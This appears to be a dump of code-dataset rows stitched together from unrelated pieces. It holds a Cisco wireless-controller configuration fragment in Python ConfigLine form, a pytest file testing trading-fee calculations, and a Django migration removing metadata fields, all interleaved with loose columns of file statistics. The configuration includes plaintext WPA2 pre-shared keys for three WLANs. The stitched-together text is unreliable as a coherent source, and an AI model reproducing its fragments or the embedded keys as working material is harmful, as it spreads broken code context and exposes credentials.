ConfigLine(config_line="config advanced 802.11a channel dca interval 1", parents=()),
ConfigLine(config_line="config advanced 802.11a channel foreign enable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel load disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel noise enable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel device disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel dca sensitivity medium", parents=()),
ConfigLine(config_line="config advanced 802.11a channel dca chan-width 20", parents=()),
ConfigLine(config_line="config advanced 802.11a channel cleanair-event disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel outdoor-ap-dca disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 36", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 40", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 44", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 48", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 52", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 56", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 60", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 64", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 100", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 104", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 108", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 112", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 116", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 120", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 124", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 128", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 132", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 136", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 140", parents=()),
ConfigLine(config_line="config advanced 802.11a channel delete 144", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 149", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 153", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 157", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 161", parents=()),
ConfigLine(config_line="config advanced 802.11a channel delete 165", parents=()),
ConfigLine(config_line="config wlan create 14 POP-101-DATA POP-101-DATA", parents=()),
ConfigLine(config_line="config wlan radio 14 all", parents=()),
ConfigLine(config_line="config wlan interface 14 data", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid enable 14", parents=()),
ConfigLine(config_line="config wlan nac radius disable 14", parents=()),
ConfigLine(config_line="config wlan mac-filtering disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa enable 14", parents=()),
ConfigLine(config_line="config wlan security ft disable 14", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers aes disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers tkip disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 enable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes enable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers tkip disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm cckm disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk enable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft 802.1x disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft psk disable 14", parents=()),
ConfigLine(config_line="config wlan security web-auth disable 14", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 14 local radius ldap", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 14", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 14", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 14", parents=()),
ConfigLine(config_line="config wlan qos 14 platinum", parents=()),
ConfigLine(config_line="config wlan avc 14 visibility disable", parents=()),
ConfigLine(config_line="config wlan wmm allow 14", parents=()),
ConfigLine(config_line="config wlan aaa-override disable 14", parents=()),
ConfigLine(config_line="config wlan chd 14 enable", parents=()),
ConfigLine(config_line="config wlan session-timeout 14 0", parents=()),
ConfigLine(config_line="config wlan usertimeout 0 14", parents=()),
ConfigLine(config_line="config wlan ccx aironetiesupport enable 14", parents=()),
ConfigLine(config_line="config wlan peer-blocking disable 14", parents=()),
ConfigLine(config_line="config wlan exclusionlist 14 disabled", parents=()),
ConfigLine(config_line="config wlan exclusionlist 14 60", parents=()),
ConfigLine(config_line="config wlan mfp client enable 14", parents=()),
ConfigLine(config_line="config wlan dtim 802.11a 1 14", parents=()),
ConfigLine(config_line="config wlan dtim 802.11b 1 14", parents=()),
ConfigLine(config_line="config wlan flexconnect local-switching 14 disable", parents=()),
ConfigLine(config_line="config wlan load-balance allow disable 14", parents=()),
ConfigLine(config_line="config wlan band-select allow disable 14", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 14", parents=()),
ConfigLine(config_line="config wlan assisted-roaming dual-list disable 14", parents=()),
ConfigLine(config_line="config wlan assisted-roaming prediction disable 14", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 14", parents=()),
ConfigLine(config_line="config wlan dms enable 14", parents=()),
ConfigLine(config_line="config wlan profiling radius dhcp disable 14", parents=()),
ConfigLine(config_line="config wlan profiling radius http disable 14", parents=()),
ConfigLine(config_line="config wlan profiling local dhcp disable 14", parents=()),
ConfigLine(config_line="config wlan profiling local http disable 14", parents=()),
ConfigLine(config_line="config wlan mdns disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk set-key ascii VlQ5548n 14", parents=()),
ConfigLine(config_line="config wlan enable 14", parents=()),
ConfigLine(config_line="config wlan create 15 POP-101-SPECIAL POP-101-SPECIAL", parents=()),
ConfigLine(config_line="config wlan radio 15 all", parents=()),
ConfigLine(config_line="config wlan interface 15 special", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid enable 15", parents=()),
ConfigLine(config_line="config wlan nac radius disable 15", parents=()),
ConfigLine(config_line="config wlan mac-filtering disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa enable 15", parents=()),
ConfigLine(config_line="config wlan security ft disable 15", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers aes disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers tkip disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 enable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes enable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers tkip disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm cckm disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk enable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft 802.1x disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft psk disable 15", parents=()),
ConfigLine(config_line="config wlan security web-auth disable 15", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 15 local radius ldap", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 15", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 15", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 15", parents=()),
ConfigLine(config_line="config wlan qos 15 platinum", parents=()),
ConfigLine(config_line="config wlan avc 15 visibility disable", parents=()),
ConfigLine(config_line="config wlan wmm allow 15", parents=()),
ConfigLine(config_line="config wlan aaa-override disable 15", parents=()),
ConfigLine(config_line="config wlan chd 15 enable", parents=()),
ConfigLine(config_line="config wlan session-timeout 15 0", parents=()),
ConfigLine(config_line="config wlan usertimeout 0 15", parents=()),
ConfigLine(config_line="config wlan ccx aironetiesupport enable 15", parents=()),
ConfigLine(config_line="config wlan peer-blocking disable 15", parents=()),
ConfigLine(config_line="config wlan exclusionlist 15 disabled", parents=()),
ConfigLine(config_line="config wlan exclusionlist 15 60", parents=()),
ConfigLine(config_line="config wlan mfp client enable 15", parents=()),
ConfigLine(config_line="config wlan dtim 802.11a 1 15", parents=()),
ConfigLine(config_line="config wlan dtim 802.11b 1 15", parents=()),
ConfigLine(config_line="config wlan flexconnect local-switching 15 disable", parents=()),
ConfigLine(config_line="config wlan load-balance allow disable 15", parents=()),
ConfigLine(config_line="config wlan band-select allow disable 15", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 15", parents=()),
ConfigLine(config_line="config wlan assisted-roaming dual-list disable 15", parents=()),
ConfigLine(config_line="config wlan assisted-roaming prediction disable 15", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 15", parents=()),
ConfigLine(config_line="config wlan dms enable 15", parents=()),
ConfigLine(config_line="config wlan profiling radius dhcp disable 15", parents=()),
ConfigLine(config_line="config wlan profiling radius http disable 15", parents=()),
ConfigLine(config_line="config wlan profiling local dhcp disable 15", parents=()),
ConfigLine(config_line="config wlan profiling local http disable 15", parents=()),
ConfigLine(config_line="config wlan mdns disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk set-key ascii SSVNeVE8 15", parents=()),
ConfigLine(config_line="config wlan enable 15", parents=()),
ConfigLine(config_line="config wlan create 16 POP-101-VOICE POP-101-VOICE", parents=()),
ConfigLine(config_line="config wlan radio 16 all", parents=()),
ConfigLine(config_line="config wlan interface 16 voice", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid enable 16", parents=()),
ConfigLine(config_line="config wlan nac radius disable 16", parents=()),
ConfigLine(config_line="config wlan mac-filtering disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa enable 16", parents=()),
ConfigLine(config_line="config wlan security ft disable 16", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers aes disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers tkip disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 enable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes enable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers tkip disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm cckm disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk enable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft 802.1x disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft psk disable 16", parents=()),
ConfigLine(config_line="config wlan security web-auth disable 16", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 16 local radius ldap", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 16", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 16", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 16", parents=()),
ConfigLine(config_line="config wlan qos 16 platinum", parents=()),
ConfigLine(config_line="config wlan avc 16 visibility disable", parents=()),
ConfigLine(config_line="config wlan wmm allow 16", parents=()),
ConfigLine(config_line="config wlan aaa-override disable 16", parents=()),
ConfigLine(config_line="config wlan chd 16 enable", parents=()),
ConfigLine(config_line="config wlan session-timeout 16 0", parents=()),
ConfigLine(config_line="config wlan usertimeout 0 16", parents=()),
ConfigLine(config_line="config wlan ccx aironetiesupport enable 16", parents=()),
ConfigLine(config_line="config wlan peer-blocking disable 16", parents=()),
ConfigLine(config_line="config wlan exclusionlist 16 disabled", parents=()),
ConfigLine(config_line="config wlan exclusionlist 16 60", parents=()),
ConfigLine(config_line="config wlan mfp client enable 16", parents=()),
ConfigLine(config_line="config wlan dtim 802.11a 1 16", parents=()),
ConfigLine(config_line="config wlan dtim 802.11b 1 16", parents=()),
ConfigLine(config_line="config wlan flexconnect local-switching 16 disable", parents=()),
ConfigLine(config_line="config wlan load-balance allow disable 16", parents=()),
ConfigLine(config_line="config wlan band-select allow disable 16", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 16", parents=()),
ConfigLine(config_line="config wlan assisted-roaming dual-list disable 16", parents=()),
ConfigLine(config_line="config wlan assisted-roaming prediction disable 16", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 16", parents=()),
ConfigLine(config_line="config wlan dms enable 16", parents=()),
ConfigLine(config_line="config wlan profiling radius dhcp disable 16", parents=()),
ConfigLine(config_line="config wlan profiling radius http disable 16", parents=()),
ConfigLine(config_line="config wlan profiling local dhcp disable 16", parents=()),
ConfigLine(config_line="config wlan profiling local http disable 16", parents=()),
ConfigLine(config_line="config wlan mdns disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk set-key ascii AntTfLJO 16", parents=()),
ConfigLine(config_line="config wlan enable 16", parents=()),
ConfigLine(config_line="config acl counter start", parents=()),
ConfigLine(config_line="config acl create Cisco8821-Provision", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 1", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 1 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 1 68 68", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 1 67 67", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 1 in", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 1 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 2", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 2 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 2 67 67", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 2 68 68", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 2 out", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 2 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 3", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 3 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 3 0 65535", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 3 5060 5061", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 3 in", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 3 deny", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 4", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 4 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 4 5060 5061", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 4 0 65535", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 4 out", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 4 deny", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 5", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 5 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 5 0 65535", parents=()),
ConfigLine(
config_line="config acl rule destination address Cisco8821-Provision 5 192.168.2.177 255.255.255.255",
parents=(),
),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 5 0 65535", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 5 in", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 5 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 6", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 6 17", parents=()),
ConfigLine(
config_line="config acl rule source address Cisco8821-Provision 6 192.168.2.177 255.255.255.255", parents=()
),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 6 0 65535", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 6 0 65535", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 6 out", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 6 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 7", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 7 any", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 7 deny", parents=()),
ConfigLine(config_line="config acl apply Cisco8821-Provision", parents=()),
ConfigLine(config_line="config wlan create 13 Cisco8821-Provision cisco", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid disable 13", parents=()),
ConfigLine(config_line="config wlan acl 13 Cisco8821-Provision", parents=()),
ConfigLine(config_line="config wlan qos 13 silver", parents=()),
ConfigLine(config_line="config wlan wmm allow 13", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 13", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes disable 13", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 disable 13", parents=()),
ConfigLine(config_line="config wlan security wpa disable 13", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 13 local radius ldap", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 13", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 13", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 13", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 13", parents=()),
ConfigLine(config_line="config wlan dms enable 13", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 13", parents=()),
ConfigLine(config_line="config wlan interface 13 voice", parents=()),
ConfigLine(config_line="config wlan chd 13 disable", parents=()),
ConfigLine(config_line="config wlan mdns disable 13", parents=()),
ConfigLine(config_line="config wlan exclusionlist 13 0", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 13", parents=()),
ConfigLine(config_line="config wlan session-timeout 13 1800", parents=()),
ConfigLine(config_line="config wlan mfp client enable 13", parents=()),
ConfigLine(config_line="config wlan enable 13", parents=()),
]
| 81.454327
| 236
| 0.740387
| 4,355
| 33,885
| 5.668657
| 0.069346
| 0.252117
| 0.315146
| 0.409689
| 0.943533
| 0.940536
| 0.917568
| 0.869729
| 0.760117
| 0.601815
| 0
| 0.06124
| 0.13354
| 33,885
| 415
| 237
| 81.650602
| 0.779598
| 0
| 0
| 0.062802
| 0
| 0.014493
| 0.488269
| 0.006463
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.002415
| 0.002415
| 0
| 0.002415
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f07520be04cc2767891964a9c4e32cc62a221014
| 7,051
|
py
|
Python
|
tests/libraries/position/test_fee.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 3
|
2022-02-17T16:11:39.000Z
|
2022-03-10T23:46:19.000Z
|
tests/libraries/position/test_fee.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 10
|
2022-01-25T21:49:20.000Z
|
2022-03-31T00:32:29.000Z
|
tests/libraries/position/test_fee.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 2
|
2022-01-21T01:04:54.000Z
|
2022-02-23T08:38:20.000Z
|
def test_trading_fee(position):
entry_price = 100000000000000000000 # 100
current_price = 150000000000000000000 # 150
notional = 10000000000000000000 # 10
debt = 2000000000000000000 # 2
liquidated = False
trading_fee_rate = 750000000000000
oi = int((notional / entry_price) * 1000000000000000000) # 0.1
fraction = 1000000000000000000 # 1
cap_payoff = 5000000000000000000 # 5
# check trading fee is notional * fee_rate
is_long = True
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 11250000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
# check trading fee is notional * fee_rate
is_long = False
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 3750000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
# check trading fee is notional * fee_rate when 0 price change
is_long = True
current_price = entry_price
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 7500000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
# check trading fee is notional * fee_rate when 0 price change
is_long = False
current_price = entry_price
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 7500000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
def test_trading_fee_when_entry_not_equal_to_mid(position):
mid_price = 100000000000000000000 # 100
current_price = 150000000000000000000 # 150
notional = 10000000000000000000 # 10
debt = 2000000000000000000 # 2
liquidated = False
trading_fee_rate = 750000000000000
oi = int((notional / mid_price) * 1000000000000000000) # 0.1
fraction = 1000000000000000000 # 1
cap_payoff = 5000000000000000000 # 5
# check trading fee is notional * fee_rate
is_long = True
entry_price = 101000000000000000000 # 101
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, mid_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 11175000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
# check trading fee is notional * fee_rate
is_long = False
entry_price = 99000000000000000000 # 99
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, mid_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 3675000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
# check trading fee is notional * fee_rate when 0 price change
is_long = True
entry_price = 101000000000000000000 # 101
current_price = entry_price
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, mid_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 7500000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
# check trading fee is notional * fee_rate when 0 price change
is_long = False
entry_price = 99000000000000000000 # 99
current_price = entry_price
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, mid_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 7500000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
def test_trading_fee_when_fraction_less_than_one(position):
entry_price = 100000000000000000000 # 100
current_price = 150000000000000000000 # 150
notional = 10000000000000000000 # 10
debt = 2000000000000000000 # 2
liquidated = False
trading_fee_rate = 750000000000000
oi = int((notional / entry_price) * 1000000000000000000) # 0.1
fraction = 250000000000000000 # 0.25
cap_payoff = 5000000000000000000 # 5
# check trading fee is notional * fee_rate
is_long = True
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 2812500000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
# check trading fee is notional * fee_rate
is_long = False
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 937500000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
def test_trading_fee_when_payoff_greater_than_cap(position):
entry_price = 100000000000000000000 # 100
current_price = 800000000000000000000 # 800
notional = 10000000000000000000 # 10
debt = 2000000000000000000 # 2
liquidated = False
trading_fee_rate = 750000000000000
oi = int((notional / entry_price) * 1000000000000000000) # 0.1
fraction = 1000000000000000000 # 1
cap_payoff = 5000000000000000000 # 5
# check trading fee is notional * fee_rate
is_long = True
# NOTE: mid_ratio tests in test_entry_price.py
mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
expect = 45000000000000000
actual = position.tradingFee(pos, fraction, oi, oi, current_price,
cap_payoff, trading_fee_rate)
assert expect == actual
| 39.172222
| 70
| 0.69437
| 830
| 7,051
| 5.640964
| 0.087952
| 0.091841
| 0.044853
| 0.03994
| 0.947245
| 0.947245
| 0.947245
| 0.907518
| 0.907518
| 0.907518
| 0
| 0.175023
| 0.239115
| 7,051
| 179
| 71
| 39.391061
| 0.69767
| 0.159694
| 0
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088
| 1
| 0.032
| false
| 0
| 0
| 0
| 0.032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65256482f8aa4e0a95469ad2cdcd3d1faa043d8d
| 2,648
|
py
|
Python
|
capstone/capdb/migrations/0090_auto_20200127_2030.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 134
|
2017-07-12T17:03:06.000Z
|
2022-03-27T06:38:29.000Z
|
capstone/capdb/migrations/0090_auto_20200127_2030.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 1,362
|
2017-06-22T17:42:49.000Z
|
2022-03-31T15:28:00.000Z
|
capstone/capdb/migrations/0090_auto_20200127_2030.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 38
|
2017-06-22T14:46:23.000Z
|
2022-03-16T05:32:54.000Z
|
# Generated by Django 2.2.9 on 2020-01-27 20:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('capdb', '0089_auto_20200127_1957'),
]
operations = [
migrations.RemoveField(
model_name='casetext',
name='metadata',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_reporter',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_jurisdiction',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_court',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_name',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_name_abbreviation',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_slug',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_name',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_name_long',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_slug',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_whitelisted',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_name',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_name_abbreviation',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_slug',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_name',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_name_long',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_slug',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_whitelisted',
),
migrations.DeleteModel(
name='CaseText',
),
]
| 28.473118
| 48
| 0.554003
| 194
| 2,648
| 7.298969
| 0.221649
| 0.120763
| 0.275424
| 0.317797
| 0.80791
| 0.80791
| 0.80791
| 0.724576
| 0.158192
| 0
| 0
| 0.01794
| 0.347432
| 2,648
| 92
| 49
| 28.782609
| 0.801505
| 0.016994
| 0
| 0.825581
| 1
| 0
| 0.253749
| 0.138793
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011628
| 0
| 0.046512
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65369793ad1f869e99347b8cdbb3f2cb3ac0aca1
| 83,773
|
py
|
Python
|
config2/tests/test_config.py
|
billycao/python-config2
|
d474e911a9ca196dbbeaafdb560f499b885de823
|
[
"MIT"
] | 20
|
2018-06-26T22:48:27.000Z
|
2021-05-06T06:07:27.000Z
|
config2/tests/test_config.py
|
billycao/python-config2
|
d474e911a9ca196dbbeaafdb560f499b885de823
|
[
"MIT"
] | 19
|
